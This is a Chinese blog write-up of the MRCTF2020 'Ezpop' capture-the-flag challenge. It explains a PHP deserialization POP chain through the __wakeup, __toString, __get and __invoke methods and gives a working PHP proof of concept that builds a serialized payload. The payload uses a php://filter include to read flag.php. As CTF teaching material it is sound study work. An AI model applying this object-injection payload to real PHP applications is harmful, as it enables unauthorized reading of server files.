[MRCTF2020]Ezpop

已于 2023-04-04 16:20:50 修改
阅读量297 收藏 1
点赞数 1
分类专栏: # web安全 文章标签: php 开发语言 安全 web安全 网络安全
于 2023-04-04 00:32:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/129940575
版权

目录

代码审计

本地测试

POC

代码审计

开局给出源码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

Modifier类中append()方法会将传入参数包含,而此处魔术方法__invoke中设置了将Modifier类中的var属性作为传入值来调用append()函数,所以在这里需要让属性var的值为flag.php,再触发魔术方法__invoke即可。魔术方法__invoke被自动调用的条件是类被当成一个函数被调用,故接着来寻找和函数调用有关的代码。

魔法函数__get中设置了属性p会被当做函数调用,刚好符合前面Modifier类中的要求。故需要再触发魔法函数__get即可,魔法函数__get会在访问类中一个不存在(或外部不可访问的私有)的属性时自动调用,那就需要寻找和调用属性相关的代码。

__toString中会返回属性str中的属性source,如果刚刚提到的source属性不存在,那么就符合了Test类中的要求,那这里。魔术方法__toString在类被当做一个字符串处理时会被自动调用,在魔术方法__wakeup则将属性source传入正则匹配函数preg_match(),在这个函数中source属性就被当做字符串处理。最终这个魔术方法__wakeup又在类被反序列化时自动调用。

 

本地测试

<?php
class Person{
    /*封装私有成员属性*/
    private $name='张三';private $sex='男';private $age=12;
    /*__get()方法用来获取私有属性*/
    function __get($property_name){
//        echo '在直接获取私有成员属性得时候,自动调用了这个__get()方法<br/>';
        if(isset($this->$property_name))
        {
            return ($this->$property_name);
        }else{
            return NULL;
        }
    }
}
$p1=new Person();
/*直接获取私有属性得值,会自动调用__get()的方法,返回成员属性的值*/
echo '姓名:'.$p1->name.'<br/>'.PHP_EOL;
echo '性别:'.$p1->sex.'<br/>'.PHP_EOL;
echo '年龄:'.$p1->age.'<br/>'.PHP_EOL;
?>

姓名:张三<br/>
性别:男<br/>
年龄:12<br/>

5.3.29下可以调用phpinfo

<?php
class Test{
    private $p='phpinfo';
    // public function __construct()
    // {
    //     $this->p = 'array';
    // }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
$a=new Test;
echo $a->$p;
?>

PHP Version 7.3.4可以调用以下PHPinfo 

<?php
class Test{
    private $p='phpinfo';
    // public function __construct()
    // {
    //     $this->p = 'array';
    // }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
$a=new Test;
$a->$eee;
?>

 PHP Version 7.3.4可以显示flag

<?php
class Modifier {
    protected  $var='flag';
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
$a=new Modifier;
$a->__invoke();
?>

 __invoke:以函数方法调用类时

<?php
 
class CallableClass
{
    public function __invoke($param1, $param2)
    {
        var_dump($param1,$param2);
    }
}
 
$obj  = new CallableClass;
$obj(123, 456);
 
// var_dump(is_callable($obj));

POC

调用过程

反序列化->调用Show类中魔术方法__wakeup->preg_match()函数对Show类的属性source处理->调用Show类中魔术方法__toString->返回Show类的属性str中的属性source(此时这里属性source并不存在)->调用Test类中魔术方法__get->返回Test类的属性p的函数调用结果->调用Modifier类中魔术方法__invoke->include()函数包含目标文件(flag.php)

<?php
class Modifier {
    protected  $var='php://filter/convert.base64-encode/resource=flag.php';
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __toString()
    {
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
class Test{
    public $p;
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
$a=new Show();
$d=new Show();
$a->source=$d;
$d->str=new Test();
($d->str)->p=new Modifier();



echo urlencode(serialize($a))
?>

最后的序列化结果进行url编码的原因:如果不进行编码,最后输出的结果是不全的,会有类显示异常的乱码,所以需要进行url编码

poc2

poc2:
$s = new Show();
$t = new Test();
$r = new Modifier();
$t->p = $r;
$s->str = $t;
$s->source = $s;

常用的类中魔法函数

__construct()//当一个对象创建时被调用
__destruct() //当一个对象销毁时被调用
__toString() //当一个对象被当作一个字符串使用
__sleep()//在对象在被序列化之前运行
__wakeup()//将在反序列化之后立即被调用(通过序列化对象元素个数不符来绕过)
__get()//获得一个类的成员变量时调用
__set()//设置一个类的成员变量时调用
__invoke()//调用函数的方式调用一个对象时的回应方法
__call()//当调用一个对象中的不能用的方法的时候就会执行这个函数

coleak
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
vigenere-cipher:Vigenere密码
03-19
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
MRCTF2020 Ezpop
Tajang的大千世界
07-10 486
打开靶机,哇,直接给源码 这道题的知识点是利用php魔术方法的相互关联,构造pop链,其实有的地方没太懂,群里Y1ng大佬还回复我了,好兴奋,这题他的wp也看过,接下来就按我的理解写 知道我对这道题理解多么蠢吗?简直蠢得不可理喻,我以为代码审计,读懂代码会和上次绕过一样的类型,后来证明我真的蠢,给大家看看我的代码审计 我是真得蠢。。。不说了,先来讲一波php魔术方法 __construct 当一个对象创建时被调用, __toString 当一个对象被当作一个字符串被调用。 __wakeup
BUUCTF [MRCTF2020]Ezpop 详解
lzu_lfl的博客
11-09 579
pop链
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2252
将pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
MRCTF2020 Ezpop wp
arcuied
11-27 473
MRCTF2020 Ezpop wp
[MRCTF2020]Ezpop_Revenge
qq_45691294的博客
10-17 1333
题目打开是个typecho博客,www.zip泄露,下载得到源码 看到flag.php可能是一个SSRF的题 <?php if(!isset($_SESSION)) session_start(); if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){ $_SESSION['flag']= "MRCTF{******}"; }else echo "我扌your problem?\nonly localhost can get flag!"; ?> 因为是一
[MRCTF2020]Ezpop 1
shinygod的博客
03-28 1337
知识点:各种魔术方法,以及构造反序列化pop链子的思路 <?php //flag is in flag.php class Modifier { protected $var="php://filter/resource=flag.php"; public function append($value){ include($value);//漏洞利用点 } public function __invoke(){ //在类被当作函数调用
buuctf-[MRCTF2020]Ezpop)(小宇特详解)
小宇的web博客
04-04 2970
buuctf-[MRCTF2020]Ezpop(小宇特详解) 1.先查看题目,题目是eazypop,说明这道题是让构造简单的pop链 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%9
BUUCTF [MRCTF2020]Ezpop
qq_52671379的博客
04-01 236
BUUCTF [MRCTF2020]Ezpop
BUUCTF [MRCTF2020]Ezpop 1
weixin_45642610的博客
04-21 1267
BUUCTF [MRCTF2020]Ezpop 1 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { pr
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
1.mrctf[friendly_sign-in] 意思就是服务器产生一个数组$N$,需要输入一个数组$X$与其对应位置乘积和为$0$,题目说$N$中全为素数,实际好像不是,因为产生这么多素数比较耗时间,但里面还是大部分都是素数。这里可以...
【全开源】多场馆场地预定小程序源码(ThinkPHP+FastAdmin+UniApp)
最新发布
u011092458的博客
05-24 585
一款基于ThinkPHP+FastAdmin+UniApp开发的多场馆场地预定小程序,提供运动场馆运营解决方案,适用于体育馆、羽毛球馆、兵乒球馆、篮球馆、网球馆等场馆。
如何构建基因单倍型网络
hgz2020的博客
05-18 647
单倍型分析
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1124
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
PHP反射API与接口的动态分析
APItesterCris的博客
05-22 298
PHP的反射(Reflection)API 提供了一种在运行时获取类和对象信息的能力,包括类的方法、属性、接口等。这对于动态分析、构建IDE的自动完成功能、或者进行复杂的元编程非常有用。以下是如何使用PHP反射API进行动态分析的示例代码。
4、PHP的xml注入漏洞(xxe)
weixin_51520483的博客
05-21 184
2、CTRL+f搜索xml,发现2.8.0版本,含有xml漏洞。5、在触发bug的包下面加上,获取flag。1、打开网页是一个PHP版本页面。青少年ctf:PHP的XXE。4、使用代码出发bug。
uniapp高校二手书交易商城回收系统 微信小程序python+java+node.js+php
QQ1304979694的博客
05-24 280
每年因为有大量的学生在接受教育,每到大学毕业季的时候,所使用的大量书籍对他们自己来说,很多是没有用,同时由于书籍多和不方便携带,导致很多大学生在毕业时将教材直接丢弃是在校大学生处理已用教材的一种主要方式。基于上述因素,同时随着校园环保热潮、倡导绿色校园等号召兴起,所以设立二手书交易小程序是很必要的,一个可以提供给想将书卖出去的人,以及想购买二手书的学生一个平台,方便更好的进行资源再利用、减轻学生的经济负担、促进高校二手书的流通,共建绿色校园。开发出一种实用性强,可靠性好,操作便捷的校园二手书交易小程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值